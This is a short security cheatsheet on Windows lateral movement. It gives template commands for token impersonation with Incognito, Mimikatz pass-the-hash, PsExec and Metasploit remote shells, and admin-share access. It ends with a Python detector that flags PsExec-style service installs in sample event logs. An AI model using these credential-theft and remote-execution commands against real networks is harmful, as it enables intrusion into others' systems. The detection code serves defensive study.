---
title: Lateral Movement
categories: [cheatsheets]
tags: [security, windows]
---

# Lateral Movement

Detailed information: https://fuzzysecurity.com/tutorials/25.html

Tools:

* nbtscan # get NetBIOS information for a host
* PsExec # get a shell on another host with credentials, or with the hash only!
* Mimikatz # dump hashes, passwords, and do pretty much everything
* Incognito # tool to impersonate tokens

## Smash-and-grab

* get whatever credentials you can get and try to use them
* passwords and hashes, doesn't matter

## Token impersonation

Grab tokens of other users (using NtQuerySystemInformation voodoo) and impersonate these tokens to do stuff as another user! -> the user must be logged in!

```
incognito> list_tokens -u
incognito> impersonate_token DOMAIN\username

// or, if it is working, use PowerSploit:
Invoke-TokenManipulation
```

## Mimikatz

Local Pass the Hash:

```
mimikatz> privilege::debug   # check if debug priv is set
mimikatz> sekurlsa::pth /user: /domain:. /ntlm:
```

## PsExec

* metasploit module: `exploit/windows/smb/psexec`
* microsoft one: `cmd> PsExec.exe \\10.0.0.100 -u -p cmd`

## Admin shares

Admin shares are automatically created by Windows and expose all partitions as hidden admin shares: `C:\ = \\ip\C$`
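From the defender's side, the PsExec-style tools above share one footprint on the target: a new service is registered through the Service Control Manager, which Windows records as System event 7045. The Python below is an added example, not part of the original cheatsheet; it scans constructed sample records (the `|`-delimited field layout and the host names are assumptions) for that pattern.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample records shaped like Windows System-log 7045 events
# ("A service was installed in the system"); not real log output.
# Fields: EventID|Computer|ServiceName|ImagePath|Account
SAMPLE_EVENTS = r"""
7045|WS01|PSEXESVC|%SystemRoot%\PSEXESVC.exe|LocalSystem
7045|WS01|WinDefend|"C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe"|LocalSystem
7045|FS02|gXkqTzLa|\\127.0.0.1\ADMIN$\gXkqTzLa.exe|LocalSystem
7045|FS02|BackupSvc|%COMSPEC% /c echo hello > \\127.0.0.1\C$\out.txt|LocalSystem
7036|WS01|Spooler||
"""

SVC_INSTALL_EVENT = "7045"
# Indicators of PsExec-style remote service creation:
#  - Sysinternals PsExec registers a service named PSEXESVC
#  - the metasploit psexec module drops a randomly named binary on the
#    ADMIN$ share, so the service image path points at an admin share
#  - remote command execution variants register the command shell itself
ADMIN_SHARE_RE = re.compile(r"\\\\[^\\]+\\(ADMIN|[A-Za-z])\$\\", re.IGNORECASE)
CMD_BINARY_RE = re.compile(r"(%COMSPEC%|\bcmd(\.exe)?\s+/c\b)", re.IGNORECASE)


@dataclass
class Finding:
    computer: str
    service: str
    image_path: str
    reasons: List[str]


def classify(event: str) -> Optional[Finding]:
    """Return a Finding when a 7045 record matches a PsExec-style pattern."""
    fields = event.split("|")
    if len(fields) < 5 or fields[0] != SVC_INSTALL_EVENT:
        return None
    _, computer, service, image_path, _account = fields[:5]
    reasons = []
    if service.upper() == "PSEXESVC":
        reasons.append("service name PSEXESVC (Sysinternals PsExec)")
    if ADMIN_SHARE_RE.search(image_path):
        reasons.append("service binary served from an admin share (ADMIN$/<drive>$)")
    if CMD_BINARY_RE.search(image_path):
        reasons.append("service binary is a command shell")
    return Finding(computer, service, image_path, reasons) if reasons else None


def scan(log_text: str) -> List[Finding]:
    """Run classify() over every record and keep the hits."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.computer}: service {f.service!r} -> {'; '.join(f.reasons)}")
```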